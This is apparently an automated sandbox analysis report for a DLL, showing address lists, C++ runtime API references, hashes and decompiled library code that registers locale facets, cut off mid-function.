0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797

APIs

__EH_prolog3.LIBCMT ref: 6E20F760
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F76A
int.LIBCPMT ref: 6E20F781

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E20F7A4
std::_Facet_Register.LIBCPMT ref: 6E20F7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F7F9

Strings

xm,n, xrefs: 6E20F775

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xm,n
API String ID: 113178234-1559963885
Opcode ID: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
Instruction ID: 8004293cadcf95e0c9dcf2b7f552294a58c66b67e777e9209cd1033daeb19f73
Opcode Fuzzy Hash: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
Instruction Fuzzy Hash: C211067A90051D9BCF01DBE0C898AEEB7BBAF44715F240908E410AB3D0DB749A44C792

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t770 - 0x14, 0);
				_t735 =  *0x6e2c6db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6E1E161C(0x6e2c6d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6E2066BA(_t770 - 0x14);
					return E6E220075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6E210F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t770 - 0x20);
							E6E223D74(_t770 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t717, _t735, 0x14);
							E6E206653(_t770 - 0x14, 0);
							_t736 =  *0x6e2c6dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6E1E161C(0x6e2c6d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6E2066BA(_t770 - 0x14);
								return E6E220075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6E210F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t770 - 0x20);
										E6E223D74(_t770 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t544, _t718, _t736, 0x14);
										E6E206653(_t770 - 0x14, 0);
										_t737 =  *0x6e2c6dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6E1E161C(0x6e2c6d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6E2066BA(_t770 - 0x14);
											return E6E220075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6E210FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t770 - 0x20);
													E6E223D74(_t770 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t544, _t719, _t737, 0x14);
													E6E206653(_t770 - 0x14, 0);
													_t738 =  *0x6e2c6df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6E1E161C(0x6e2c6d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6E2066BA(_t770 - 0x14);
														return E6E220075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6E211057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t770 - 0x20);
																E6E223D74(_t770 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t544, _t720, _t738, 0x14);
																E6E206653(_t770 - 0x14, 0);
																_t739 =  *0x6e2c6dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6E1E161C(0x6e2c6d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6E2066BA(_t770 - 0x14);
																	return E6E220075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6E2110BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t770 - 0x20);
																			E6E223D74(_t770 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t544, _t721, _t739, 0x14);
																			E6E206653(_t770 - 0x14, 0);
																			_t740 =  *0x6e2c6df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6E1E161C(0x6e2c6da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6E2066BA(_t770 - 0x14);
																				return E6E220075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6E211127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t770 - 0x20);
																						E6E223D74(_t770 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t544, _t722, _t740, 0x14);
																						E6E206653(_t770 - 0x14, 0);
																						_t741 =  *0x6e2c6df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6E1E161C(0x6e2c6da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6E2066BA(_t770 - 0x14);
																							return E6E220075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6E2111AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t770 - 0x20);
																									E6E223D74(_t770 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t544, _t723, _t741, 0x14);
																									E6E206653(_t770 - 0x14, 0);
																									_t742 =  *0x6e2c6dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6E1E161C(0x6e2c6d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6E2066BA(_t770 - 0x14);
																										return E6E220075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6E211230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t770 - 0x20);
																												E6E223D74(_t770 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t544, _t724, _t742, 0x14);
																												E6E206653(_t770 - 0x14, 0);
																												_t743 =  *0x6e2c6dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6E1E161C(0x6e2c6d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6E2066BA(_t770 - 0x14);
																													return E6E220075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6E2112B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t770 - 0x20);
																															E6E223D74(_t770 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t544, _t725, _t743, 0x14);
																															E6E206653(_t770 - 0x14, 0);
																															_t744 =  *0x6e2c6dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6E1E161C(0x6e2c6d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6E2066BA(_t770 - 0x14);
																																return E6E220075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6E211339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t770 - 0x20);
																																		E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t544, _t726, _t744, 0x14);
																																		E6E206653(_t770 - 0x14, 0);
																																		_t745 =  *0x6e2c6db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6E1E161C(0x6e2c6d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6E2066BA(_t770 - 0x14);
																																			return E6E220075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6E2113A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t770 - 0x20);
																																					E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t544, _t727, _t745, 0x14);
																																					E6E206653(_t770 - 0x14, 0);
																																					_t746 =  *0x6e2c6ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6E1E161C(0x6e2c6d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6E2066BA(_t770 - 0x14);
																																						return E6E220075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6E211409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t770 - 0x20);
																																								E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t544, _t728, _t746, 0x14);
																																								E6E206653(_t770 - 0x14, 0);
																																								_t747 =  *0x6e2c6de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6E1E161C(0x6e2c6d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6E2066BA(_t770 - 0x14);
																																									return E6E220075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6E211471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t770 - 0x20);
																																											E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t544, _t729, _t747, 0x14);
																																											E6E206653(_t770 - 0x14, 0);
																																											_t748 =  *0x6e2c6dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6E1E161C(0x6e2c6da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6E2066BA(_t770 - 0x14);
																																												return E6E220075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6E2114EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t770 - 0x20);
																																														E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t544, _t730, _t748, 0x14);
																																														E6E206653(_t770 - 0x14, 0);
																																														_t749 =  *0x6e2c6dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6E1E161C(0x6e2c6d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6E2066BA(_t770 - 0x14);
																																															return E6E220075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6E211558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t770 - 0x20);
																																																	E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t544, _t731, _t749, 0x14);
																																																	E6E206653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6e2c6e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6E1E161C(0x6e2c6dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6E2066BA(_t770 - 0x14);
																																																		return E6E220075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6E2115C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t770 - 0x20);
																																																				E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t544, _t732, _t750, 0x14);
																																																				E6E206653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6e2c6dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6E1E161C(0x6e2c6d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6E2066BA(_t770 - 0x14);
																																																					return E6E220075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6E21162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6E1E1438(_t663);
																																																							E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e26851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6e26c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6E21542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6E220075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6E206FD3(__eflags, _t733);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6e2c6dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6E206FD3(__eflags, _t732);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6e2c6e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6E206FD3(__eflags, _t731);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6e2c6dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6E206FD3(__eflags, _t730);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6e2c6dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6E206FD3(__eflags, _t729);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6e2c6de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6E206FD3(__eflags, _t728);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6e2c6ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6E206FD3(__eflags, _t727);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6e2c6db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6E206FD3(__eflags, _t726);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6e2c6dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6E206FD3(__eflags, _t725);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6e2c6dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6E206FD3(__eflags, _t724);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6e2c6dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6E206FD3(__eflags, _t723);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6e2c6df4 = _t723;
																									goto L47;
